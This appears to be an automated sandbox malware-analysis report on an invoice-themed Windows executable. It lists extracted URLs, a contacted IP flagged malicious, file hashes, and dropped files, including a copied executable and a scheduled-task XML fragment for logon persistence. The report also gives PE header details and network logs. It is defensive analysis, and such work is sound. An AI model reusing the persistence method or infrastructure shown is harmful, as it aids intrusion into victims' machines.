                          		high
                          http://www.fontbureau.com/designersGFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                            		high
                            http://www.jiyu-kobo.co.jp/XDiUaFactura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.com/designers/?Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                              		high
                              http://www.fonts.comcFactura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cn/bTheFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cn2U%Factura de proforma.exe, 00000000.00000003.304064871.0000000005B0D000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.founder.com.cn/cn.UFactura de proforma.exe, 00000000.00000003.304064871.0000000005B0D000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/tDMUFactura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designers?Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                		high
                                http://www.sandoll.co.krN.TTFsFactura de proforma.exe, 00000000.00000003.303541923.0000000005AD9000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.tiro.comFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.tiro.comFFactura de proforma.exe, 00000000.00000003.301130424.0000000005AEB000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.goodfont.co.krFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/a-eoDFU$Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/jp/Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fonts.com-uTFactura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://en.wFactura de proforma.exe, 00000000.00000003.299841120.0000000000D0D000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.collada.org/2005/11/COLLADASchema9DoneFactura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/koFactura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.carterandcone.comlFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comFactura de proforma.exe, 00000000.00000003.300417307.0000000005AEB000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cTheFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comFactura de proforma.exe, 00000000.00000003.301130424.0000000005AEB000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnFactura de proforma.exe, 00000000.00000003.304081072.0000000005AD4000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.jiyu-kobo.co.jp/tFactura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/7DFactura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designerskSHUFactura de proforma.exe, 00000000.00000003.307837879.0000000005ADD000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.fonts.comnFactura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8Factura de proforma.exe, 00000000.00000003.307837879.0000000005ADD000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.fonts.comFactura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000003.303541923.0000000005AD9000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/JDFactura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFactura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.sakkal.comFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.dotname.co.kr/customer/event/2019/20190604_landing_dotname?c6=kr386M7znJup/B2j4KhdpwCgkxcscript.exe, 0000000A.00000002.573092724.00000000051DF000.00000004.00020000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              13.209.99.177
                                              		parking3.dnstool.netUnited States
                                              		16509AMAZON-02UStrue

                                              General Information

                                              Joe Sandbox Version:33.0.0 White Diamond
                                              Analysis ID:502357
                                              Start date:13.10.2021
                                              Start time:20:33:12
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 11m 20s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:Factura de proforma.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:24
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@10/4@4/1
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 13.8% (good quality ratio 12.5%)
                                              • Quality average: 75.1%
                                              • Quality standard deviation: 30.9%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 88
                                              • Number of non-executed functions: 148
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.82.210.154, 8.247.248.249, 8.247.248.223, 8.247.244.221, 2.20.178.10, 2.20.178.56, 20.199.120.85, 20.199.120.151, 2.20.178.33, 2.20.178.24, 20.54.110.249, 40.112.88.60, 52.251.79.25
                                              • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              20:34:22API Interceptor1x Sleep call for process: Factura de proforma.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              AMAZON-02USOHqOvvjgbN.msiGet hashmaliciousBrowse
                                              • 52.95.165.3
                                              Gsdqz.dllGet hashmaliciousBrowse
                                              • 3.126.56.137
                                              OCT 13 2021 - PRINT COPY.xlsxGet hashmaliciousBrowse
                                              • 18.197.254.181
                                              HUTWMrDhov.dllGet hashmaliciousBrowse
                                              • 18.156.0.31
                                              M1YceQ237E.dllGet hashmaliciousBrowse
                                              • 18.184.201.8
                                              Sajeeb09908976745344567.xlsxGet hashmaliciousBrowse
                                              • 3.64.163.50
                                              2OfuyvjJu1.msiGet hashmaliciousBrowse
                                              • 52.95.163.44
                                              cvWFjfKtdHGet hashmaliciousBrowse
                                              • 54.103.213.234
                                              K3h3TPEpzeGet hashmaliciousBrowse
                                              • 34.219.214.170
                                              Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                              • 54.230.206.106
                                              Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                              • 54.230.206.106
                                              Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                              • 54.230.206.51
                                              Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                              • 54.230.206.25
                                              Ref 0180066743.xlsxGet hashmaliciousBrowse
                                              • 13.232.45.220
                                              pago atrasado.exeGet hashmaliciousBrowse
                                              • 3.64.163.50
                                              6AYs2EgVeN.apkGet hashmaliciousBrowse
                                              • 52.222.174.50
                                              4f0PBbcOBIGet hashmaliciousBrowse
                                              • 34.249.145.219
                                              REQUIREMENT.exeGet hashmaliciousBrowse
                                              • 3.121.211.190
                                              RlypFfB7n8Get hashmaliciousBrowse
                                              • 54.171.230.55
                                              7iw4z5I41wGet hashmaliciousBrowse
                                              • 34.249.145.219

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Factura de proforma.exe.log
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):1308
                                              Entropy (8bit):5.348115897127242
                                              Encrypted:false
                                              SSDEEP:24:MLUE4KJXE4qpE4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKorE4x88:MIHKtH2HKXE1qHmAHKzvRYHKhQnoPtH2
                                              MD5:832D6A22CE7798D72609B9C21B4AF152
                                              SHA1:B086DE927BFEE6039F5555CE53C397D1E59B4CA4
                                              SHA-256:9E5EE72EF293C66406AF155572BF3B0CF9DA09CC1F60ED6524AAFD65553CE551
                                              SHA-512:A1A70F76B98C2478830AE737B4F12507D859365F046C5A415E1EBE3D87FFD2B64663A31E1E5142F7C3A7FE9A6A9CB8C143C2E16E94C3DD6041D1CCABEDDD2C21
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows
                                              C:\Users\user\AppData\Local\Temp\tmpD689.tmp
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1646
                                              Entropy (8bit):5.186739433298605
                                              Encrypted:false
                                              SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBTGYtn:cbh47TlNQ//rydbz9I3YODOLNdq3X
                                              MD5:1E44E6ADAE1C0CA0FD56FA664DDFE899
                                              SHA1:BED45CA5BDDB3ED71E73A72C6058ED5101440C3F
                                              SHA-256:55CBE776A65A94D258CC0EA3911132969AED0F6979BE24A24BE4C4FB9F44E20A
                                              SHA-512:0F7E8D6686C0E5DE421C909904A5116A35E5A55FA3C61388C9665A4A81B145F3B0B0247CC3ED70F07014C2EB76F51EAC224F1F4E3CAB18FB5F0506BF49A42BCA
                                              Malicious:true
                                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                              C:\Users\user\AppData\Roaming\tskpCbAwtxoaw.exe
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):495616
                                              Entropy (8bit):7.503647477821442
                                              Encrypted:false
                                              SSDEEP:12288:x0K9jbtvzZPJukNeFrmndcPeGGUQSB/a:xh/plBlMFrleGfdB/
                                              MD5:16F7045EEBB451234CA8078222C5994C
                                              SHA1:99E8F263F9E34AD13CB8CD6AF1BB816DEFFB5BDE
                                              SHA-256:FF344E635B268090AAFDB8FA830E76C41F34D7CF9A9BF03ED4EDE2705008BFEF
                                              SHA-512:147D377F3F05F593E7428F5E5DD70C231E187C73DE1CDF111790156060F59047E80F382805678ECD3F946C58FCF5D80F4E16D8534F07F0F7355BEDEDB7726BB8
                                              Malicious:false
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z.fa..............0.................. ... ....@.. ....................................@.....................................O.... ............................................................................... ............... ..H............text... .... ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H.......Lb..,O......Y...x...Pk...........................................0..V.........}......*.*s....}......}......}.....(.......(......{....r...po......{....r...po.....*...0.............(....&.{.........,....8....sA...%.{.....|....(....Z.{.....|....(....Z . &.s....} ...%.}......{ ...(.........(....o........+c...+C.....X.].......,+..(.......{....Z...{....Z.{.....{....o ........X.....|....(..........-....X.....|....(..........-......,...o!.....sB........|....(.....|....(....s"
                                              C:\Users\user\AppData\Roaming\tskpCbAwtxoaw.exe:Zone.Identifier
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview: [ZoneTransfer]....ZoneId=0

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.503647477821442
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:Factura de proforma.exe
                                              File size:495616
                                              MD5:16f7045eebb451234ca8078222c5994c
                                              SHA1:99e8f263f9e34ad13cb8cd6af1bb816deffb5bde
                                              SHA256:ff344e635b268090aafdb8fa830e76c41f34d7cf9a9bf03ed4ede2705008bfef
                                              SHA512:147d377f3f05f593e7428f5e5dd70c231e187c73de1cdf111790156060f59047e80f382805678ecd3f946c58fcf5d80f4e16d8534f07f0f7355bededb7726bb8
                                              SSDEEP:12288:x0K9jbtvzZPJukNeFrmndcPeGGUQSB/a:xh/plBlMFrleGfdB/
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z.fa..............0.................. ... ....@.. ....................................@................................

                                              File Icon

                                              Icon Hash:c4b28ed696aa92c0

                                              Static PE Info

                                              General

                                              Entrypoint:0x461d1a
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x6166B25A [Wed Oct 13 10:18:02 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x61cc80x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x18c84.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7c0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x5fd200x5fe00False0.887357908246data7.7904887088IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc0x620000x18c840x18e00False0.195302685302data5.06927966627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x7c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0x621800x468GLS_BINARY_LSB_FIRST
                                              RT_ICON0x625f80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                              RT_ICON0x636b00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                              RT_ICON0x65c680x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                              RT_ICON0x69ea00x10828dBase III DBT, version number 0, next free block index 40
                                              RT_GROUP_ICON0x7a6d80x4cdata
                                              RT_VERSION0x7a7340x350data
                                              RT_MANIFEST0x7aa940x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Version Infos

                                              DescriptionData
                                              Translation0x0000 0x04b0
                                              LegalCopyrightCopyright Gottschalks 2011
                                              Assembly Version1.0.0.0
                                              InternalNameCachedDa.exe
                                              FileVersion1.0.0.0
                                              CompanyNameGottschalks
                                              LegalTrademarks
                                              Comments
                                              ProductNameMapEditor1
                                              ProductVersion1.0.0.0
                                              FileDescriptionMapEditor1
                                              OriginalFilenameCachedDa.exe

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 13, 2021 20:36:07.331458092 CEST4980680192.168.2.313.209.99.177
                                              Oct 13, 2021 20:36:07.588181019 CEST804980613.209.99.177192.168.2.3
                                              Oct 13, 2021 20:36:07.588268042 CEST4980680192.168.2.313.209.99.177
                                              Oct 13, 2021 20:36:07.588450909 CEST4980680192.168.2.313.209.99.177
                                              Oct 13, 2021 20:36:07.845433950 CEST804980613.209.99.177192.168.2.3
                                              Oct 13, 2021 20:36:07.845493078 CEST804980613.209.99.177192.168.2.3
                                              Oct 13, 2021 20:36:07.845526934 CEST804980613.209.99.177192.168.2.3
                                              Oct 13, 2021 20:36:07.845746040 CEST4980680192.168.2.313.209.99.177
                                              Oct 13, 2021 20:36:07.845786095 CEST4980680192.168.2.313.209.99.177
                                              Oct 13, 2021 20:36:08.103004932 CEST804980613.209.99.177192.168.2.3

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 13, 2021 20:35:46.794310093 CEST5652753192.168.2.38.8.8.8
                                              Oct 13, 2021 20:35:46.817334890 CEST53565278.8.8.8192.168.2.3
                                              Oct 13, 2021 20:36:07.032196999 CEST5805853192.168.2.38.8.8.8
                                              Oct 13, 2021 20:36:07.327236891 CEST53580588.8.8.8192.168.2.3
                                              Oct 13, 2021 20:36:29.043936014 CEST5153953192.168.2.38.8.8.8
